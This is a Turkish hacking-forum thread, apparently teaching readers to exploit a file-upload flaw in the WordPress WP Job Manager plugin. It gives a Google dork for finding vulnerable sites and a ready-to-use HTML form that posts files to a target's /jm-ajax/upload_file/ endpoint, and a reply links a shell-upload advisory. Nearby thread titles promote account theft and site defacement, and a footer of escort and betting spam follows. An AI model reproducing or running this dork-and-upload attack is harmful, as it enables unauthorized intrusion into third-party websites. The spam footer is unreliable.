Konu Bilgileri
Konu: Yeni Wordpress Açığı # N0XI Yazar: N0XI
Okunma: 1215 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
İlk olarak googleyi açıp
Kod:

inurl:/wp-content/plugins/wp-job-manager/

Yazıyoruz tarayıcı farketmez.

[Resim: Prv4A7.png]


Daha sonra herhangi bir siteye giriyoruz.Ve exploit-imizi siteye ekliyoruz;




https://site.co/jm-ajax/upload_file/

Herneyse sitemize girdik.Karşımıza böyle bir yer geliyor,


[Resim: YN3P9E.png]
Sitede bu yazmazsa olmaz.



[Resim: pWvq3z.png]

En önemli kısma geldik dikkatli izleyin dostlarım;

Kod:

<form method="POST" action="https://sitecom/jm-ajax/upload_file/" enctype="multipart/form-data"> <input type="file" name="files[]" /> <button>Upload!</button><br/> </form>
[b]site.com Yazan yere sitemizin adını yazıyoruz ve html olarak kaydediyoruz yani yeni metn belgesi açın .html olarak kaydedin[/b]

[Resim: qW9qZQ.png]
Bunun gibi olsun anladınız umarım [Resim: smile.gif]

Daha sonra [b]html dosyamızı açın ve karşımıza böyle bi kısım gelcek 

upload-a
 basın resminizi yükleyin.
[/b]


[Resim: aGPqr7.png]

Yükleyebileceğiniz dosya türleri: jpg,png,gif

Ben [b].jpg yükledim siz istediğinizi yükleyin;[/b]


[Resim: JldLgj.png]

Tüm adımları yaptıktan sonra karşınıza böyle bi yer gelicek;

[Resim: 9dvXjO.png]

Böyle bir yazı geldiği zaman Resimimiz yüklenmiştir,peki resmimizin nerde olduğunu öğrenmek istiyorsanız şu kodu yazın;
Kod:

YYYY:2017 Hangi yıldaysanız;

MM:06 Hangi aydaysanız;

Dosyaadi:Benimki 33.jpg Sizinki neyse öyle yazarsınız.
Alıntıdır
 ♥ "Bize Vatan delisi diyorlar, kafayı vatanla bozmuşsunuz diyorlar! Çok şükür kafamız bozuk, kanımız değil.♥ 


cCc ULKUCU HAREKAT CcC 


Ara
Cevapla
#2
Kod:
https://packetstormsecurity.com/files/137866/WordPress-WP-Job-Manager-1.25-Shell-Upload.html
Cevapla


Yeni Wordpress Açığı # N0XI Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  İnstagram Hesap ÇALMA // N0XI AĞZINDAN N0XI 314 105,565 18.02.2020, Saat:09:38
Son Yorum: serhat1410
  Mailman açığı zone kasmak isteyenler tess 70 10,437 30.12.2019, Saat:23:57
Son Yorum: Savasci1
  Wordpress Upload Dorku tess 79 11,420 26.05.2017, Saat:21:03
Son Yorum: Albertwesker
  İndex Kodlarının Çalınmasını Önle!. // N0XI N0XI 7 1,480 26.05.2017, Saat:00:02
Son Yorum: zaffari
  301 Adet Wordpress Dork YildizTurk 0 684 11.09.2016, Saat:15:07
Son Yorum: YildizTurk


mersin escort bayan | mersin escort | escort mersin | antalya escort izmir escort izmir escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno erotik hikaye hack forum